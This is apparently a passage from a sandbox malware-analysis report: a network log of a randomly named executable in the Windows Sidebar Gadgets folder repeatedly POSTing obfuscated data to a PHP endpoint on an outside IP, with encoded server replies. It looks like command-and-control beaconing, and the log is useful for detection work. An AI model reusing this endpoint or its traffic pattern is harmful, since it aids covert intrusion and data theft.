Jan 3, 2025 09:07:59.740391970 CET | 376 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Host: 86.110.194.28
Content-Length: 2576
Expect: 100-continue
Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:08:00.098030090 CET2576OUTData Raw: 5b 5c 5b 5c 58 59 55 58 54 5b 59 5a 5b 50 57 5d 5f 51 5a 59 52 51 50 40 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [\[\XYUXT[YZ[PW]_QZYRQP@_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][%()]5,W%<'>.X3$\&/=5*#^,$$B&, ?9#Y'$X.
Jan 3, 2025 09:08:00.426891088 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 09:08:00.556009054 CET | 207 | IN | HTTP/1.1 200 OK
Date: Fri, 03 Jan 2025 08:08:00 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 4
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 3f 55 5d 54
Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.4 | 49812 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 09:08:00.678788900 CET | 376 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Host: 86.110.194.28
Content-Length: 2576
Expect: 100-continue
Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:08:01.035653114 CET2576OUTData Raw: 5b 5d 5b 5f 58 58 50 5b 54 5b 59 5a 5b 55 57 52 5f 56 5a 5d 52 54 50 46 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [][_XXP[T[YZ[UWR_VZ]RTPF_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][%+=-Z690V1?<>;6%4*1Y%S5$>7;,$*+$/;(#Y'$X.)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.2.4 | 49813 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 09:08:01.291289091 CET | 376 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Host: 86.110.194.28
Content-Length: 2164
Expect: 100-continue
Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:08:01.644948006 CET2164OUTData Raw: 5e 56 5e 5f 5d 59 55 5a 54 5b 59 5a 5b 5f 57 53 5f 52 5a 5b 52 52 50 47 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: ^V^_]YUZT[YZ[_WS_RZ[RRPG_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&@<6!\02Z$C(;3&%/%"7:#(4X$$<$))#Y'$X.
Jan 3, 2025 09:08:01.979612112 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 09:08:02.111846924 CET | 380 | IN | HTTP/1.1 200 OK
Date: Fri, 03 Jan 2025 08:08:01 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 152
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 0d 1d 24 5d 31 2b 22 13 29 2f 02 00 32 0d 25 58 22 33 3c 5c 2c 30 2a 0b 21 2c 3a 02 25 15 05 08 2b 13 0c 09 3f 1d 3d 56 37 00 2d 1f 3f 1a 28 5d 03 10 3a 01 28 2e 2c 02 28 2e 35 5e 39 27 3b 5c 27 37 01 05 3d 55 39 13 31 02 04 1d 21 5b 30 0a 3d 33 29 13 26 3b 3f 06 28 30 30 06 27 17 20 54 0b 17 27 57 27 20 01 5f 26 2b 3d 10 2a 37 27 04 33 04 2e 0e 35 3c 35 09 20 2a 3f 05 2f 20 3e 0f 25 38 0b 55 3e 3e 2b 54 25 04 04 5c 30 3b 2e 5c 23 0f 28 55 0d 34 57 50
                                                                                                                                                                  Data Ascii: $]1+")/2%X"3<\,0*!,:%+?=V7-?(]:(.,(.5^9';\'7=U91![0=3)&;?(00' T'W' _&+=*7'3.5<5 *?/ >%8U>>+T%\0;.\#(U4WP


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.2.4 | 49818 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 09:08:01.503454924 CET | 376 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Host: 86.110.194.28
Content-Length: 2576
Expect: 100-continue
Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:08:01.848066092 CET2576OUTData Raw: 5b 50 5b 5b 5d 5a 50 5d 54 5b 59 5a 5b 53 57 5f 5f 54 5a 5c 52 5d 50 44 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [P[[]ZP]T[YZ[SW__TZ\R]PD_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][%?>""'1<8=8*39%?"B94+ \0#0;<#Y'$X.1
Jan 3, 2025 09:08:02.214308977 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 09:08:02.346234083 CET | 207 | IN | HTTP/1.1 200 OK
Date: Fri, 03 Jan 2025 08:08:02 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 4
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 3f 55 5d 54
Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.2.4 | 49825 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 09:08:02.474680901 CET | 352 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Host: 86.110.194.28
Content-Length: 2564
Expect: 100-continue
                                                                                                                                                                  Jan 3, 2025 09:08:02.832442999 CET2564OUTData Raw: 5e 55 5b 5a 58 5b 55 58 54 5b 59 5a 5b 57 57 5b 5f 56 5a 58 52 51 50 43 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: ^U[ZX[UXT[YZ[WW[_VZXRQPC_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][%(.)!\'1,0@)]*^07=2?9S5$"4;(':(A$? W<)#Y'$X.)
Jan 3, 2025 09:08:03.181154966 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 09:08:03.313182116 CET | 151 | IN | HTTP/1.1 200 OK
Date: Fri, 03 Jan 2025 08:08:03 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 4
Content-Type: text/html; charset=UTF-8
Data Raw: 3f 55 5d 54
Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.2.4 | 49831 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 09:08:03.447108030 CET | 352 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Host: 86.110.194.28
Content-Length: 2576
Expect: 100-continue
                                                                                                                                                                  Jan 3, 2025 09:08:03.816484928 CET2576OUTData Raw: 5b 51 5e 59 58 5f 55 5b 54 5b 59 5a 5b 50 57 5b 5f 51 5a 5c 52 56 50 40 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [Q^YX_U[T[YZ[PW[_QZ\RVP@_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][%()58V2Z<@=;60$.%Y6"$: 0X39'3,W<)#Y'$X.
Jan 3, 2025 09:08:04.237641096 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 09:08:04.373054028 CET | 151 | IN | HTTP/1.1 200 OK
Date: Fri, 03 Jan 2025 08:08:04 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 4
Content-Type: text/html; charset=UTF-8
Data Raw: 3f 55 5d 54
Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
49 | 192.168.2.4 | 49837 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 09:08:04.515244961 CET | 376 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Host: 86.110.194.28
Content-Length: 2576
Expect: 100-continue
Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:08:04.863758087 CET2576OUTData Raw: 5e 50 5e 5c 58 5a 55 58 54 5b 59 5a 5b 51 57 5c 5f 5d 5a 55 52 54 50 46 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: ^P^\XZUXT[YZ[QW\_]ZURTPF_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&B)>-5:#&?')8-35[1?6.# 3:;&/<S+#Y'$X.9
Jan 3, 2025 09:08:05.205550909 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 09:08:05.334104061 CET | 207 | IN | HTTP/1.1 200 OK
Date: Fri, 03 Jan 2025 08:08:05 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 4
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 3f 55 5d 54
Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
50 | 192.168.2.4 | 49843 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 09:08:05.461045980 CET | 376 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Host: 86.110.194.28
Content-Length: 2576
Expect: 100-continue
Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:08:05.816828966 CET2576OUTData Raw: 5b 56 5e 58 58 5b 50 5b 54 5b 59 5a 5b 5e 57 52 5f 56 5a 5a 52 55 50 47 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [V^XX[P[T[YZ[^WR_VZZRUPG_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&?>[59/2(D>3'9]%*5'%U#8$(D$()#Y'$X.
Jan 3, 2025 09:08:06.160938978 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 09:08:06.291901112 CET | 207 | IN | HTTP/1.1 200 OK
Date: Fri, 03 Jan 2025 08:08:06 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 4
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 3f 55 5d 54
Data Ascii: ?U]T


                                                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                  51 | 192.168.2.4 | 49849 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                  Jan 3, 2025 09:08:06.494801044 CET | 376 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:08:06.848973989 CET | 2576 | OUT | Data Raw: 5b 57 5e 59 5d 5e 50 51 54 5b 59 5a 5b 5e 57 5a 5f 51 5a 59 52 5d 50 45 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [W^Y]^PQT[YZ[^WZ_QZYR]PE_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&)>"!(%/(8=3'*2,>")T70)#'/U<)#Y'$X.
                                                                                                                                                                  Jan 3, 2025 09:08:07.173010111 CET | 25 | IN | HTTP/1.1 100 Continue


                                                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                  52 | 192.168.2.4 | 49852 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                  Jan 3, 2025 09:08:07.183634043 CET | 376 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2164
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:08:07.535588026 CET | 2164 | OUT | Data Raw: 5b 57 5e 58 58 5a 50 5c 54 5b 59 5a 5b 56 57 52 5f 56 5a 5c 52 5c 50 48 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [W^XXZP\T[YZ[VWR_VZ\R\PH_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][%(>":<%<((6^'X&Y)5Q7+%)4$$?#Y'$X.%
                                                                                                                                                                  Jan 3, 2025 09:08:07.848640919 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:08:07.981812000 CET | 380 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:07 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                  Content-Length: 152
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 0d 1d 27 02 26 2b 31 00 28 3c 3b 58 26 33 0f 5e 36 30 23 04 2f 33 35 1b 35 02 3d 5f 31 5d 20 51 3f 03 0f 1b 3f 0d 2e 0d 23 3d 2d 1e 3c 0a 28 5d 03 10 39 5b 3f 3e 37 12 3d 2e 3a 00 3a 0e 23 5c 27 09 34 5c 3e 33 21 56 27 3c 26 56 22 03 2f 56 2a 33 0b 5b 33 02 2f 05 28 0e 2c 01 27 3d 20 54 0b 17 27 1c 33 20 24 00 26 38 29 1f 29 19 38 12 27 04 25 56 21 3c 2d 0e 20 17 2f 02 2f 1e 29 57 27 28 3e 0e 2b 2d 20 0c 26 3a 35 01 33 01 2e 5c 23 0f 28 55 0d 34 57 50
                                                                                                                                                                  Data Ascii: '&+1(<;X&3^60#/355=_1] Q??.#=-<(]9[?>7=.::#\'4\>3!V'<&V"/V*3[3/(,'= T'3 $&8))8'%V!<- //)W'(>+- &:53.\#(U4WP


                                                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                  53 | 192.168.2.4 | 49856 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                  Jan 3, 2025 09:08:07.334470034 CET | 376 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:08:07.691826105 CET | 2576 | OUT | Data Raw: 5b 54 5e 5b 58 5b 55 5b 54 5b 59 5a 5b 5f 57 5c 5f 57 5a 59 52 50 50 42 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [T^[X[U[T[YZ[_W\_WZYRPPB_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][%+-6!)0U&**Y'B9% '%!;<Y0(@&<;(#Y'$X.
                                                                                                                                                                  Jan 3, 2025 09:08:08.032813072 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:08:08.163777113 CET | 207 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:07 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                  54 | 192.168.2.4 | 49862 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                  Jan 3, 2025 09:08:08.285571098 CET | 352 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Jan 3, 2025 09:08:08.644962072 CET | 2576 | OUT | Data Raw: 5b 57 5e 59 58 5c 55 5d 54 5b 59 5a 5b 52 57 5f 5f 50 5a 5c 52 53 50 49 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [W^YX\U]T[YZ[RW__PZ\RSPI_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&E<["(T2Z E>1$4=Z%=V!7&7('*?'<,S+#Y'$X.5
                                                                                                                                                                  Jan 3, 2025 09:08:08.980829954 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:08:09.116115093 CET | 151 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:08 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                  55 | 192.168.2.4 | 49868 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                  Jan 3, 2025 09:08:09.319385052 CET | 352 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Jan 3, 2025 09:08:09.677324057 CET | 2576 | OUT | Data Raw: 5b 50 5b 58 5d 59 55 5a 54 5b 59 5a 5b 52 57 5c 5f 54 5a 5e 52 50 50 40 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
